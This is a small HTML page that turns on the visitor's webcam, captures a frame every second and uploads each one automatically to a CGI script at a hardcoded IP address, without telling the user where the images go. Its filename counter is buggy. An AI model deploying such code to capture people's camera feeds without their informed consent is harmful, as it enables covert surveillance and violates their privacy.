<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Automatic Image Capture and Upload</title>
</head>
<body>
    <h1>Automatic Image Capture and Upload</h1>
    <video id="video" width="640" height="480" autoplay></video>
    <canvas id="canvas" style="display: none;"></canvas>
    <script>
        const video = document.getElementById('video');
        const canvas = document.getElementById('canvas');
        
        navigator.mediaDevices.getUserMedia({ video: true })
            .then((stream) => {
                video.srcObject = stream;
            })
            .catch((error) => {
                console.error('Error accessing webcam:', error);
            });
        
        
        setInterval(() => {
            canvas.width = video.videoWidth;
            canvas.height = video.videoHeight;
            canvas.getContext('2d').drawImage(video, 0, 0, canvas.width, canvas.height);
            canvas.toBlob((blob) => {
                const formData = new FormData();
		    let i = 0;
		    formData.append('image', blob, `image${i++}.png` );
                fetch('https://65.0.74.31/cgi-bin/upload.py', { method: 'POST', body: formData })
                    .then(response => response.text())
                    .then(data => console.log(data))
                    .catch(error => console.error('Error uploading image:', error));
            });
        }, 1000);
    </script>
</body>
</html>

